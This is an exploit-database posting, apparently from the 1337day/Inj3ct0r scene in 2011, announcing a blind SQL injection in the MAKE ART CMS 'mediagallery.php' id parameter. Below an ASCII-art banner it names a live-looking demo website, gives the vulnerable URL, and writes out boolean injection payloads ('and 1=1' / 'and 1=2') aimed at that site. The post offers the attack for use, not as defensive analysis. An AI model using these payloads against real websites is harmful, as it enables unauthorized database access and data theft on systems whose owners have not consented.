#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               ########################################               1
#0                I'm OuTLaWz member from Inj3ct0r Team                 1
#1               ########################################               0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# spl0itz title: MAKE ART CMS (mediagallery.php) Blind SQL Injection Vulnerability

# date: 31/08/2011

# author: OuTLaWz aka The_Exploited

# vendor: http://www.make-art.it/

# version: all

# category:: webapps

# google dork: no dork bro, is for the lamer ;)

# tested on: windows seven 32bit

# demo site: http://www.inabruzzo.com/

# vuln url: http://www.inabruzzo.com/mediagallery.php?id=208

# blind sqli: http://www.inabruzzo.com/mediagallery.php?id=208 and 1=1 //\\ http://www.inabruzzo.com/mediagallery.php?id=208 and 1=2

// 2Pac R.I.P.